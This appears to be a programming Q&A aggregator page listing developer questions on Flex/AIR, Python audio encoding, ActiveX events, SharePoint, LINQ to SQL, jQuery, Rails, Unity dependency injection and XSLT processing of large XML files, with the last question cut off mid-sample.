    Hi, I'm a complete newbie to Flex, so apologies for my dumbness. I've searched for an answer but haven't found anything that seems to be doing the trick. What I'm trying to do: port this example http://www.adobe.com/devnet/air/flex/articles/flex_air_codebase_print.html to Flash Builder 4. All seems to be fine but for one thing. When I use the original code for the Air application <?xml version="1.0" encoding="utf-8"?> <s:WindowedApplication xmlns:fx="http://ns.adobe.com/mxml/2009" xmlns:s="library://ns.adobe.com/flex/spark" xmlns:mx="library://ns.adobe.com/flex/mx" creationComplete="onApplicationComplete()"> <fx:Script> <![CDATA[ private static const neededForCompilation:AirGeneralImplementation = null; private function onApplicationComplete():void { var can:MainCanvas = new MainCanvas(); this.addChild(can); can.labelMessage = "Loaded in an AIR Application "; } ]]> </fx:Script> <fx:Declarations> <!-- Place non-visual elements (e.g., services, value objects) here --> </fx:Declarations> </s:WindowedApplication> I get this run time error Error: addChild() is not available in this class. Instead, use addElement() or modify the skin, if you have one. at spark.components.supportClasses::SkinnableComponent/addChild()[E:\dev\4.0.0\frameworks\projects\spark\src\spark\components\supportClasses\SkinnableComponent.as:1038] If I substitute the code with this.addElement(can); Everything loads well but the first time I try to press any of the buttons on the main canvas I get the following run time error ArgumentError: Error #2025: The supplied DisplayObject must be a child of the caller. at flash.display::DisplayObjectContainer/getChildIndex() at mx.managers::SystemManager/getChildIndex()[E:\dev\4.0.0\frameworks\projects\framework\src\mx\managers\SystemManager.as:1665] at mx.managers.systemClasses::ActiveWindowManager/mouseDownHandler()[E:\dev\4.0.0\frameworks\projects\framework\src\mx\managers\systemClasses\ActiveWindowManager.as:437] here's the super simple code for the main canvas <?xml version="1.0" encoding="utf-8"?> <s:Application xmlns:fx="http://ns.adobe.com/mxml/2009" xmlns:s="library://ns.adobe.com/flex/spark" xmlns:mx="library://ns.adobe.com/flex/mx" minWidth="955" minHeight="600" creationComplete="init();"> <fx:Declarations> <!-- Place non-visual elements (e.g., services, value objects) here --> </fx:Declarations> <fx:Script source="main.as" /> <mx:Label id="lblMessage" text="The UI from the shared Flex app BothCode" x="433" y="112"/> <s:Button x="433" y="141" click="saveFile();" label="Save File"/> <s:Button x="601" y="141" click="GeneralFactory.getGeneralInstance().airOnlyFunctionality();" label="Air Only"/> </s:Application> Any help would be immensely appreciated. And any pointers to how to setup a project that can compile in both Air and Flash while sharing the same code, all for Flex 4, would also be immensely appreciated. thank you!

    Read the article

  • [python] voice communication for python help!

    - by Eric
    Hello! I'm currently trying to write a voicechat program in python. All tips/trick is welcome to do this. So far I found pyAudio to be a wrapper of PortAudio. So I played around with that and got an input stream from my microphone to be played back to my speakers. Only RAW of course. But I can't send RAW-data over the netowrk (due the size duh), so I'm looking for a way to encode it. And I searched around the 'net and stumbled over this speex-wrapper for python. It seems to good to be true, and believe me, it was. You see in pyAudio you can set the size of the chunks you want to take from your input audiobuffer, and in that sample code on the link, it's set to 320. Then when it's encoded, its like ~40 bytes of data per chunk, which is fairly acceptable I guess. And now for the problem. I start a sample program which just takes the input stream, encodes the chunks, decodes them and play them (not sending over the network due testing). If I just let my computer idle and run this program it works great, but as soon as I do something, i.e start Firefox or something, the audio input buffer gets all clogged up! It just grows and then it all crashes and gives me an overflow error on the buffer.. OK, so why am I just taking 320 bytes of the stream? I could just take like 1024 bytes or something and that will easy the pressure on the buffer. BUT. If I give speex 1024 bytes of data to encode/decode, it either crashes and says that thats too big for its buffer. OR it encodes/decodes it, but the sound is very noisy and "choppy" as if it only encoded a tiny bit of that 1024 chunk and the rest is static noise. So the sound sounds like a helicopter, lol. I did some research and it seems that speex only can convert 320 bytes of data at time, and well, 640 for wide-band. But that's the standard? How can I fix this problem? How should I construct my program to work with speex? I could use a middle-buffer tho that takes all available data to read from the buffer, then chunk this up in 320 bits and encode/decode them. But this takes a bit longer time and seems like a very bad solution of the problem.. Because as far as I know, there's no other encoder for python that encodes the audio so it can be sent over the network in acceptable small packages, or? I've been googling for three days now. Also there is this pyMedia library, I don't know if its good to convert to mp3/ogg for this kind of software. Thank in in advance for reading this, hope anyone can help me! (:

    Read the article

  • IE attachEvent on object tag causes memory corruption

    - by larswa
    I've an ActiveX Control within an embedded IE8 HTML page that has the following event MessageReceived([in] BSTR srcWindowId, [in] BSTR json). On Windows the event is registered with OCX.attachEvent("MessageReceived", onMessageReceivedFunc). Following code fires the event in the HTML page. HRESULT Fire_MessageReceived(BSTR id, BSTR json) { CComVariant varResult; T* pT = static_cast<T*>(this); int nConnectionIndex; CComVariant* pvars = new CComVariant[2]; int nConnections = m_vec.GetSize(); for (nConnectionIndex = 0; nConnectionIndex < nConnections; nConnectionIndex++) { pT->Lock(); CComPtr<IUnknown> sp = m_vec.GetAt(nConnectionIndex); pT->Unlock(); IDispatch* pDispatch = reinterpret_cast<IDispatch*>(sp.p); if (pDispatch != NULL) { VariantClear(&varResult); pvars[1] = id; pvars[0] = json; DISPPARAMS disp = { pvars, NULL, 2, 0 }; pDispatch->Invoke(0x1, IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD, &disp, &varResult, NULL, NULL); } } delete[] pvars; // -> Memory Corruption here! return varResult.scode; } After I enabled gflags.exe with application verifier, the following strange behaviour occur: After Invoke() that is executing the JavaScript callback, the BSTR from pvars[1] is copied to pvars[0] for some unknown reason!? The delete[] of pvars causes a double free of the same string then which ends in a heap corruption. Does anybody has an idea whats going on here? Is this a IE bug or is there a trick within the OCX Implementation that I'm missing? If I use the tag like: <script for="OCX" event="MessageReceived(id, json)" language="JavaScript" type="text/javascript"> window.onMessageReceivedFunc(windowId, json); </script> ... the strange copy operation does not occur. The following code also seem to be ok due to the fact that the caller of Fire_MessageReceived() is responsible for freeing the BSTRs. HRESULT Fire_MessageReceived(BSTR srcWindowId, BSTR json) { CComVariant varResult; T* pT = static_cast<T*>(this); int nConnectionIndex; VARIANT pvars[2]; int nConnections = m_vec.GetSize(); for (nConnectionIndex = 0; nConnectionIndex < nConnections; nConnectionIndex++) { pT->Lock(); CComPtr<IUnknown> sp = m_vec.GetAt(nConnectionIndex); pT->Unlock(); IDispatch* pDispatch = reinterpret_cast<IDispatch*>(sp.p); if (pDispatch != NULL) { VariantClear(&varResult); pvars[1].vt = VT_BSTR; pvars[1].bstrVal = srcWindowId; pvars[0].vt = VT_BSTR; pvars[0].bstrVal = json; DISPPARAMS disp = { pvars, NULL, 2, 0 }; pDispatch->Invoke(0x1, IID_NULL, LOCALE_USER_DEFAULT, DISPATCH_METHOD, &disp, &varResult, NULL, NULL); } } delete[] pvars; return varResult.scode; } Thanks!

    Read the article

  • Event receiver on Content Type not triggered on WikiPageLibrary

    - by Ciprian Grosu
    Hello all, I created a new content type for a wiki page library. I added this content type to library by code (the interface did not allow this). Next, I added an event receiver to this content type (on ItemAdded and ItemAdding). My problem is that no event is trrigered. If I add this events directly to the wiki page library all works fine. Is there a limitation/bug/trick ? I looked at the content type attached to the library with SharePoint Manager and in his schema the part for event receiver is missing...I know that there should be something like: <XmlDocuments> <XmlDocument NamespaceURI="http://schemas.microsoft.com/sharepoint/events"> <spe:Receivers xmlns:spe="http://schemas.microsoft.com/sharepoint/events"> <Receiver> <Name> </Name> <Type>1</Type> <SequenceNumber>10000</SequenceNumber> <Assembly>RssFeedWP, Version=1.0.0.0, Culture=neutral, PublicKeyToken=f6722cbeba696def</Assembly> <Class>RssFeedWP.ItemEventReceiver</Class> <Data> </Data> <Filter> </Filter> </Receiver> <Receiver> <Name> </Name> <Type>10001</Type> <SequenceNumber>10000</SequenceNumber> <Assembly>RssFeedWP, Version=1.0.0.0, Culture=neutral, PublicKeyToken=f6722cbeba696def</Assembly> <Class>RssFeedWP.ItemEventReceiver</Class> <Data> </Data> <Filter> </Filter> </Receiver> </spe:Receivers> </XmlDocument> If I look with SPM to the content type added to site I see this part into schema. Here is my code: public override void FeatureActivated(SPFeatureReceiverProperties properties) { using (SPWeb web = (SPWeb)properties.Feature.Parent) { // create RssWiki content type SPContentType rssFeedContentType = new SPContentType(web.AvailableContentTypes["Wiki Page"], web.ContentTypes, "RssFeed Wiki Page"); // add rssfeed url field to the new content type AddFieldToContentType(web, rssFeedContentType, "RssFeed Url", SPFieldType.Note); // add use xslt check box field to the new content type AddFieldToContentType(web, rssFeedContentType, "Use Xslt", SPFieldType.Boolean); // add xslt url field to the new content type AddFieldToContentType(web, rssFeedContentType, "Xslt Url", SPFieldType.Note); web.ContentTypes.Add(rssFeedContentType); rssFeedContentType.Update(); web.Update(); AddContentTypeToList(web, rssFeedContentType); AddEventReceiversToCT(rssFeedContentType); //AddEventReceiverToList(web); } } private void AddFieldToContentType(SPWeb web, SPContentType ct, string fieldName, SPFieldType fieldType) { SPField rssUrlField = null; try { rssUrlField = web.Fields.GetField(fieldName); } catch (Exception ex) { if (rssUrlField == null) { web.Fields.Add(fieldName, fieldType, false); } } SPFieldLink rssUrlFieldLink = new SPFieldLink(web.Fields[fieldName]); ct.FieldLinks.Add(rssUrlFieldLink); } private static void AddContentTypeToList(SPWeb web, SPContentType ct) { SPList wikiList = web.Lists[listName]; wikiList.ContentTypesEnabled = true; wikiList.ContentTypes.Add(ct); wikiList.Update(); } private static void AddEventReceiversToCT(SPContentType ct) { //add event receivers string assemblyName = System.Reflection.Assembly.GetExecutingAssembly().FullName; string ctReceiverName = "RssFeedWP.ItemEventReceiver"; ct.EventReceivers.Add(SPEventReceiverType.ItemAdding, assemblyName, ctReceiverName); ct.EventReceivers.Add(SPEventReceiverType.ItemAdded, assemblyName, ctReceiverName); ct.Update(); } Thx !

    Read the article

  • Linq to SQL NullReferenceException's: A random needle in a haystack!

    - by Shane
    I'm getting NullReferenceExeceptions at seemly random times in my application and can't track down what could be causing the error. I'll do my best to describe the scenario and setup. Any and all suggestions greatly appreciated! C# .net 3.5 Forms Application, but I use the WebFormRouting library built by Phil Haack (http://haacked.com/archive/2008/03/11/using-routing-with-webforms.aspx) to leverage the Routing libraries of .net (usually used in conjunction with MVC) - intead of using url rewriting for my urls. My database has 60 tables. All Normalized. It's just a massive application. (SQL server 2008) All queries are built with Linq to SQL in code (no SP's). Each time a new instance of my data context is created. I use only one data context with all relationships defined in 4 relationship diagrams in SQL Server. the data context gets created a lot. I let the closing of the data context be handled automatically. I've heard arguments both sides about whether you should leave to be closed automatically or do it yourself. In this case I do it myself. It doesnt seem to matter if I'm creating a lot of instances of the data context or just one. For example, I've got a vote-up button. with the following code, and it errors probably 1 in 10-20 times. protected void VoteUpLinkButton_Click(object sender, EventArgs e) { DatabaseDataContext db = new DatabaseDataContext(); StoryVote storyVote = new StoryVote(); storyVote.StoryId = storyId; storyVote.UserId = Utility.GetUserId(Context); storyVote.IPAddress = Utility.GetUserIPAddress(); storyVote.CreatedDate = DateTime.Now; storyVote.IsDeleted = false; db.StoryVotes.InsertOnSubmit(storyVote); db.SubmitChanges(); // If this story is not yet published, check to see if we should publish it. Make sure that // it is already approved. if (story.PublishedDate == null && story.ApprovedDate != null) { Utility.MakeUpcommingNewsPopular(storyId); } // Refresh our page. Response.Redirect("/news/" + category.UniqueName + "/" + RouteData.Values["year"].ToString() + "/" + RouteData.Values["month"].ToString() + "/" + RouteData.Values["day"].ToString() + "/" + RouteData.Values["uniquename"].ToString()); } The last thing I tried was the "Auto Close" flag setting on SQL Server. This was set to true and I changed to false. Doesnt seem to have done the trick although has had a good overall effect. Here's a detailed that wasnt caught. I also get slighly different errors when caught by my try/catch's. System.Web.HttpUnhandledException: Exception of type 'System.Web.HttpUnhandledException' was thrown. --- System.NullReferenceException: Object reference not set to an instance of an object. at System.Web.Util.StringUtil.GetStringHashCode(String s) at System.Web.UI.ClientScriptManager.EnsureEventValidationFieldLoaded() at System.Web.UI.ClientScriptManager.ValidateEvent(String uniqueId, String argument) at System.Web.UI.WebControls.TextBox.LoadPostData(String postDataKey, NameValueCollection postCollection) at System.Web.UI.Page.ProcessPostData(NameValueCollection postData, Boolean fBeforeLoad) at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) --- End of inner exception stack trace --- at System.Web.UI.Page.HandleError(Exception e) at System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) at System.Web.UI.Page.ProcessRequest(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) at System.Web.UI.Page.ProcessRequest() at System.Web.UI.Page.ProcessRequest(HttpContext context) at ASP.forms_news_detail_aspx.ProcessRequest(HttpContext context) at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously) HELP!!!

    Read the article

  • Animated background image in a hidden <div> doesn't load or loads not animated

    - by Guanche
    Hello, I have spent the whole day trying to make a script which on "submit" hides the form and shows hidden with animated progress bar. The problem is that Internet Explorer doesn't show animated gif images in hidden divs. The images are static. I visited many websites and found a script which uses: document.getElementById(id).style.backgroundImage = 'url(/images/load.gif)'; Finally, my script works in Internet Explorer, Firefox, Opera but... Google Chrome doesn't display the image at all. I see only div text. After many tests I discovered the following: the only way to see the background image in Google Chrome is to include the same image somewhere in the page (outside of hidden div) with 1px dimensions: <img src="/images/load.gif" width="1" heigh="1" /> This did the trick but... after this dirty solution Microsoft Explorer for some reason shows the image as static again. So, my question is: is there any way how to force Gogle Chrome to show the image? Thanks. This is my script: <script language="JavaScript" type="text/javascript"> function ver (id, elementId){ if (document.getElementById('espera').style.visibility == "visible") { return false; }else{ var esplit = document.forms[0]['userfile'].value.split("."); ext = esplit[esplit.length-1]; if (document.forms[0]['userfile'].value == '') { alert('Please select a file'); return false; }else{ if ((ext.toLowerCase() == 'jpg')) { document.getElementById(id).style.position = 'absolute'; document.getElementById(id).style.display = 'inline'; document.getElementById(id).style.visibility = "visible"; document.getElementById(id).style.backgroundImage = 'url(/images/load.gif)'; document.getElementById(id).style.height = "100px"; document.getElementById(id).style.backgroundColor = '#f3f3f3'; document.getElementById(id).style.backgroundRepeat = "no-repeat"; document.getElementById(id).style.backgroundPosition = "50% 50%"; var element; if (document.all) element = document.all[elementId]; else if (document.getElementById) element = document.getElementById(elementId); if (element && element.style) element.style.display = 'none'; return true; }else{ alert('This is not a jpg file'); return false; } } } } </script> <div id="frmDiv"> <form enctype="multipart/form-data" action="/upload.php" method="post" name="upload3" onsubmit="return ver('espera','frmDiv');"> <input type="hidden" name="max_file_size" value="4194304" /> <table border="0" cellspacing="1" cellpadding="2" width="100%"> <tr bgcolor="#f5f5f5"> <td>File (jpg)</td> <td> <input type="file" name="userfile" class="upf" /></td></tr> <tr bgcolor="#f5f5f5"> <td>&nbsp;</td> <td> <input class="upf2" type="submit" name="add" value="Upload" /> </td></tr></table></form> </div> <div id="espera" style="display:none;text-align:center;float:left;width:753px;">&nbsp;<br />&nbsp;<br />&nbsp;<br />&nbsp;<br /> &nbsp;<br />Please wait...<br />&nbsp; </div>

    Read the article

  • Partial generic type inference possible in C#?

    - by Lasse V. Karlsen
    I am working on rewriting my fluent interface for my IoC class library, and when I refactored some code in order to share some common functionality through a base class, I hit upon a snag. Note: This is something I want to do, not something I have to do. If I have to make do with a different syntax, I will, but if anyone has an idea on how to make my code compile the way I want it, it would be most welcome. I want some extension methods to be available for a specific base-class, and these methods should be generic, with one generic type, related to an argument to the method, but the methods should also return a specific type related to the particular descendant they're invoked upon. Better with a code example than the above description methinks. Here's a simple and complete example of what doesn't work: using System; namespace ConsoleApplication16 { public class ParameterizedRegistrationBase { } public class ConcreteTypeRegistration : ParameterizedRegistrationBase { public void SomethingConcrete() { } } public class DelegateRegistration : ParameterizedRegistrationBase { public void SomethingDelegated() { } } public static class Extensions { public static ParameterizedRegistrationBase Parameter<T>( this ParameterizedRegistrationBase p, string name, T value) { return p; } } class Program { static void Main(string[] args) { ConcreteTypeRegistration ct = new ConcreteTypeRegistration(); ct .Parameter<int>("age", 20) .SomethingConcrete(); // <-- this is not available DelegateRegistration del = new DelegateRegistration(); del .Parameter<int>("age", 20) .SomethingDelegated(); // <-- neither is this } } } If you compile this, you'll get: 'ConsoleApplication16.ParameterizedRegistrationBase' does not contain a definition for 'SomethingConcrete' and no extension method 'SomethingConcrete'... 'ConsoleApplication16.ParameterizedRegistrationBase' does not contain a definition for 'SomethingDelegated' and no extension method 'SomethingDelegated'... What I want is for the extension method (Parameter<T>) to be able to be invoked on both ConcreteTypeRegistration and DelegateRegistration, and in both cases the return type should match the type the extension was invoked on. The problem is as follows: I would like to write: ct.Parameter<string>("name", "Lasse") ^------^ notice only one generic argument but also that Parameter<T> returns an object of the same type it was invoked on, which means: ct.Parameter<string>("name", "Lasse").SomethingConcrete(); ^ ^-------+-------^ | | +---------------------------------------------+ .SomethingConcrete comes from the object in "ct" which in this case is of type ConcreteTypeRegistration Is there any way I can trick the compiler into making this leap for me? If I add two generic type arguments to the Parameter method, type inference forces me to either provide both, or none, which means this: public static TReg Parameter<TReg, T>( this TReg p, string name, T value) where TReg : ParameterizedRegistrationBase gives me this: Using the generic method 'ConsoleApplication16.Extensions.Parameter<TReg,T>(TReg, string, T)' requires 2 type arguments Using the generic method 'ConsoleApplication16.Extensions.Parameter<TReg,T>(TReg, string, T)' requires 2 type arguments Which is just as bad. I can easily restructure the classes, or even make the methods non-extension-methods by introducing them into the hierarchy, but my question is if I can avoid having to duplicate the methods for the two descendants, and in some way declare them only once, for the base class. Let me rephrase that. Is there a way to change the classes in the first code example above, so that the syntax in the Main-method can be kept, without duplicating the methods in question? The code will have to be compatible with both C# 3.0 and 4.0. Edit: The reason I'd rather not leave both generic type arguments to inference is that for some services, I want to specify a parameter value for a constructor parameter that is of one type, but pass in a value that is a descendant. For the moment, matching of specified argument values and the correct constructor to call is done using both the name and the type of the argument. Let me give an example: ServiceContainerBuilder.Register<ISomeService>(r => r .From(f => f.ConcreteType<FileService>(ct => ct .Parameter<Stream>("source", new FileStream(...))))); ^--+---^ ^---+----^ | | | +- has to be a descendant of Stream | +- has to match constructor of FileService If I leave both to type inference, the parameter type will be FileStream, not Stream.

    Read the article

  • XSLT transformation by grouping based on 3 elements/attributes

    - by Daniel
    This question is related to http://stackoverflow.com/questions/2863202/xslt-1-0-grouping-to-reformat-element-defined-by-date-into-element-defined-by-tas Just to understand more clearly the trick behind. How would the XSLT look like if we were to group by date, task and shift as below: Input XML; <Person> <name>John</name> <date>June12</date> <shift tier=1> <workTime taskID=1>34</workTime> <workTime taskID=2>12</workTime> </shift> <shift tier=2> <workTime taskID=1>3</workTime> </shift> </Person> <Person> <name>John</name> <date>June13</date> <shift tier=1> <workTime taskID=1>21</workTime> <workTime taskID=2>11</workTime> </shift> <shift tier=2> <workTime taskID=1>2</workTime> </shift> </Person> and similarly, the output would be <Person> <name>John</name> <tier>1</tier> <taskID>1</taskID> <workTime> <date>June12</date> <time>34</time> </worTime> <workTime> <date>June13</date> <time>21</time> </worTime> </Person> <Person> <name>John</name> <tier>1</tier> <taskID>2</taskID> <workTime> <date>June12</date> <time>12</time> </worTime> <workTime> <date>June13</date> <time>11</time> </worTime> </Person> <Person> <name>John</name> <tier>2</tier> <taskID>1</taskID> <workTime> <date>June12</date> <time>3</time> </worTime> <workTime> <date>June13</date> <time>2</time> </worTime> </Person>

    Read the article

  • Search Form in Responsive Design - Remove Search button on Mobile

    - by Kevin
    I'm working with a search box in the header of a responsive website. On desktop/tablet widths, there's a search input field and a styled 'search' button to the right. You can type in a search term and either click 'SEARCH' button or just hit enter on the keyboard with the same result. When you scale down to mobile widths, the search input field fills the width of the screen. The submit button falls below it. On a desktop, clicking the button or hitting enter activate the search. On an actual iphone phone, you can hit the 'SEARCH' button, but the native mobile keyboard that rises from the bottom of the screen has a search button where the enter/return key would normally be. It seems to know I'm in a form and the keyboard automatically gives me the option to kick off the search by basically hitting the ENTER key location....but it says SEARCH. So far so good. I figure I don't need the button in the header on mobile since it's already in the keyboard. Therefore, I'll hide the button on mobile widths and everything will be tighter and look better. So I added this to my CSS to hide it in mobile: #search-button {display: none;} But now the search doesn't work at all. On mobile, I don't get the option in the keyboard that showed up before and if I just hit enter, it doesn't work at all. On desktop at mobile width, hitting enter also not longer works. So clearly by hiding the submit/search button, the phone no longer gave me the native option to run the search. In addition, on the desktop at mobile width, even hitting enter inside the search input box also fails to launch the the search. Here's my search box: <form id="search-form" method="get" accept-charset="UTF-8, utf-8" action="search.php"> <fieldset> <div id="search-wrapper"> <label id="search-label" for="search">Item:</label> <input id="search" class="placeholder-color" name="item" type="text" placeholder="Item Number or Description" /> <button id="search-button" title="Go" type="submit"><span class="search-icon"></span></button> </div> </fieldset> </form> Here's what my CSS looks like: #search-wrapper { float: left; display: inline-block; position: relative; white-space: nowrap; } #search-button { display: inline-block; cursor: pointer; vertical-align: top; height: 30px; width: 40px; } @media only screen and (max-width: 639px) { #search-wrapper { display: block; margin-bottom: 7px; } #search-button { /* this didn't work....it hid the button but the search failed to load */ display: none;*/ } } So.....how can I hide this submit button when I'm on a mobile screen, but still let the search run from the mobile keyboard or just run by hitting enter when in the search input box. I was sure that putting display:none on the search button at mobile width would do the trick, but apparently not. Thanks...

    Read the article

  • Javascript phsyics in a 2d space

    - by eroo
    So, I am working on teaching myself Canvas (HTML5) and have most of a simple game engine coded up. It is a 2d representation of a space scene (planets, stars, celestial bodies, etc). My default "Sprite" class has a frame listener like such: "baseClass" contains a function that allows inheritance and applies "a" to "this.a". So, "var aTest = new Sprite({foo: 'bar'});" would make "aTest.foo = 'bar'". This is how I expose my objects to each other. { Sprite = baseClass.extend({ init: function(a){ baseClass.init(this, a); this.fields = new Array(); // list of fields of gravity one is in. Not sure if this is a good idea. this.addFL(function(tick){ // this will change to be independent of framerate soon. // and this is where I need help // gobjs is an array of all the Sprite objects in the "world". for(i = 0; i < gobjs.length; i++){ // Make sure its got setup correctly, make sure it -wants- gravity, and make sure it's not -this- sprite. if(typeof(gobjs[i].a) != undefined && !gobjs[i].a.ignoreGravity && gobjs[i].id != this.id){ // Check if it's within a certain range (obviously, gravity doesn't work this way... But I plan on having a large "space" area, // And I can't very well have all objects accounted for at all times, can I? if(this.distanceTo(gobjs[i]) < this.s.size*10 && gobjs[i].fields.indexOf(this.id) == -1){ gobjs[i].fields.push(this.id); } } } for(i = 0; i < this.fields.length; i++){ distance = this.distanceTo(gobjs[this.fields[i]]); angletosun = this.angleTo(gobjs[this.fields[i]])*(180/Math.PI); // .angleTo works very well, returning the angle in radians, which I convert to degrees here. // I have no idea what should happen here, although through trial and error (and attempting to read Maths papers on gravity (eeeeek!)), this sort of mimics gravity. // angle is its orientation, currently I assign a constant velocity to one of my objects, and leave the other static (it ignores gravity, but still emits it). this.a.angle = angletosun+(75+(distance*-1)/5); //todo: omg learn math if(this.distanceTo(gobjs[this.fields[i]]) > gobjs[this.fields[i]].a.size*10) this.fields.splice(i); // out of range, stop effecting. } }); } }); } Thanks in advance. The real trick is that one line: { this.a.angle = angletosun+(75+(distance*-1)/5); } This is more a physics question than Javascript, but I've searched and searched and read way to many wiki articles on orbital mathematics. It gets over my head very quickly. Edit: There is a weirdness with the SO formatting; forgives me, I is noobie.

    Read the article

  • How to use jQuery to assign a class to only one radio button in a group when user clicks on it?

    - by xraminx
    I have the following markup. I would like to add class_A to <p class="subitem-text"> (that holds the radio button and the label) when user clicks on the <input> or <label>. If user clicks some other radio-button/label in the same group, I would like to add class_A to this radio-button's parent paragraph and remove class_A from any other paragraph that hold radio-buttons/labels in that group. Effectively, in each <li>, only one <p class="subitem-text"> should have class_A added to it. Is there a jQuery plug-in that does this? Or is there a simple trick that can do this? <ul> <li> <div class="myitem-wrapper" id="10"> <div class="myitem clearfix"> <span class="number">1</span> <div class="item-text">Some text here </div> </div> <p class="subitem-text"> <input type="radio" name="10" value="15" id="99"> <label for="99">First subitem </label> </p> <p class="subitem-text"> <input type="radio" name="10" value="77" id="21"> <label for="21">Second subitem</label> </p> </div> </li> <li> <div class="myitem-wrapper" id="11"> <div class="myitem clearfix"> <span class="number">2</span> <div class="item-text">Some other text here ... </div> </div> <p class="subitem-text"> <input type="radio" name="11" value="32" id="201"> <label for="201">First subitem ... </label> </p> <p class="subitem-text"> <input type="radio" name="11" value="68" id="205"> <label for="205">Second subitem ...</label> </p> <p class="subitem-text"> <input type="radio" name="11" value="160" id="206"> <label for="206">Third subitem ...</label> </p> </div> </li>

    Read the article

  • Rails destroy confirm with Jquery AJAX

    - by Mike
    I have got this working for the most part. My rails link is: <%= link_to(image_tag('/images/bin.png', :alt => 'Remove'), @business, :class => 'delete', :confirm => 'Are you sure?', :id => 'trash') %> :class = "delete" is calling an ajax function so that it is deleted and the page isn't refreshed that works great. But because the page doesn't refresh, it is still there. So my id trash is calling this jquery function: $('[id^=trash]').click(function(){ var row = $(this).closest("tr").get(0); $(row).hide(); return false; }); Which is hiding the row of whatever trash icon i clicked on. This also works great. I thought I had it all worked out and then I hit this problem. When you click on my trash can I have this confirm box pop up to ask you if you are sure. Regardless of whether you choose cancel or accept, the jquery fires and it hides the row. It isn't deleted, only hidden till you refresh the page. I tried changing it so that the prompt is done through jquery, but then rails was deleteing the row regardless of what i choose in my prompt because the .destroy function was being called when the prompt was being called. My question really is how can i get the value to cancel or accept from the rails confirm pop up so that in my jquery I can have an if statement that hides if they click accept and does nothing if they click cancel. EDIT: Answering Question below. That did not work. I tried changing my link to: <%= link_to(image_tag('/images/bin.png', :alt => 'Remove'), @business, :class => "delete", :onclick => "trash") %> and putting this in my jquery function trash(){ if(confirm("Are you sure?")){ var row = $(this).closest("tr").get(0); $(row).hide(); return false; } else { //they clicked no. } } But the function was never called. It just deletes it with no prompt and doesn't hide it. But that gave me an idea. I took the delete function that ajax was calling $('a.delete').click (function(){ $.post(this.href, {_method:'delete'}, null, "script"); $(row).hide(); }); And modified it implementing your code: remove :confirm = 'Are you sure?' $('a.delete').click (function(){ if(confirm("Are you sure?")){ var row = $(this).closest("tr").get(0); $.post(this.href, {_method:'delete'}, null, "script"); $(row).hide(); return false; } else { //they clicked no. return false; } }); Which does the trick.

    Read the article

  • Applying Unity in dynamic menu

    - by Rajarshi
    I was going through Unity 2.0 to check if it has an effective use in our new application. My application is a Windows Forms application and uses a traditional bar menu (at the top), currently. My UIs (Windows Forms) more or less support Dependency Injection pattern since they all work with a class (Presentation Model Class) supplied to them via the constructor. The form then binds to the properties of the supplied P Model class and calls methods on the P Model class to perform its duties. Pretty simple and straightforward. How P Model reacts to the UI actions and responds to them by co-ordinating with the Domain Class (Business Logic/Model) is irrelevant here and thus not mentioned. The object creation sequence to show up one UI from menu then goes like this - Create Business Model instance Create Presentation Model instance with Business Model instance passed to P Model constructor. Create UI instance with Presentation Model instance passed to UI constructor. My present solution: To show an UI in the method above from my menu I would have to refer all assemblies (Business, PModel, UI) from my Menu class. Considering I have split the modules into a number of physical assemblies, that would be a dificult task to add references to about 60 different assemblies. Also the approach is not very scalable since I would certainly need to release more modules and with this approach I would have to change the source code every time I release a new module. So primarily to avoid the reference of so many assemblies from my Menu class (assembly) I did as below - Stored all the dependency described above in a database table (SQL Server), e.g. ModuleShortCode | BModelAssembly | BModelFullTypeName | PModelAssembly | PModelFullTypeName | UIAssembly | UIFullTypeName Now used a static class named "Launcher" with a method "Launch" as below - Launcher.Launch("Discount") Launcher.Launch("Customers") The Launcher internally uses data from the dependency table and uses Activator.CreateInstance() to create each of the objects and uses the instance as constructor parameter to the next object being created, till the UI is built. The UI is then shown as a modal dialog. The code inside Launcher is somewhat like - Form frm = ResolveForm("Discount"); frm.ShowDialog(); The ResolveForm does the trick of building the chain of objects. Can Unity help me here? Now when I did that I did not have enough information on Unity and now that I have studied Unity I think I have been doing more or less the same thing. So I tried to replace my code with Unity. However, as soon as I started I hit a block. If I try to resolve UI forms in my Menu as Form customers = myUnityContainer.Resolve(); or Form customers = myUnityContainer.Resolve(typeof(Customers)); Then either way, I need to refer to my UI assembly from my Menu assembly since the target Type "Customers" need to be known for Unity to resolve it. So I am back to same place since I would have to refer all UI assemblies from the Menu assembly. I understand that with Unity I would have to refer fewer assemblies (only UI assemblies) but those references are needed which defeats my objectives below - Create the chain of objects dynamically without any assembly reference from Menu assembly. This is to avoid Menu source code changing every time I release a new module. My Menu also is built dynamically from a table. Be able to supply new modules just by supplying the new assemblies and inserting the new Dependency row in the table by a database patch. At this stage, I have a feeling that I have to do it the way I was doing, i.e. Activator.CreateInstance() to fulfil all my objectives. I need to verify whether the community thinks the same way as me or have a better suggestion to solve the problem. The post is really long and I sincerely thank you if you come til this point. Waiting for your valuable suggestions. Rajarshi

    Read the article

  • Doing XML extracts with XSLT without having to read the whole DOM tree into memory?

    - by Thorbjørn Ravn Andersen
    I have a situation where I want to extract some information from some very large but regular XML files (just had to do it with a 500 Mb file), and where XSLT would be perfect. Unfortunately those XSLT implementations I am aware of (except the most expensive version of Saxon) does not support only having the necessary part of the DOM read in but reads in the whole tree. This cause the computer to swap to death. The XPath in question is //m/e[contains(.,'foobar') so it is essentially just a grep. Is there an XSLT implementation which can do this? Or an XSLT implementation which given suitable "advice" can do this trick of pruning away the parts in memory which will not be needed again? I'd prefer a Java implementation but both Windows and Linux are viable native platforms. EDIT: The input XML looks like: <log> <!-- Fri Jun 26 12:09:27 CEST 2009 --> <e h='12:09:27,284' l='org.apache.catalina.session.ManagerBase' z='1246010967284' t='ContainerBackgroundProcessor[StandardEngine[Catalina]]' v='10000'> <m>Registering Catalina:type=Manager,path=/axsWHSweb-20090626,host=localhost</m></e> <e h='12:09:27,284' l='org.apache.catalina.session.ManagerBase' z='1246010967284' t='ContainerBackgroundProcessor[StandardEngine[Catalina]]' v='10000'> <m>Force random number initialization starting</m></e> <e h='12:09:27,284' l='org.apache.catalina.session.ManagerBase' 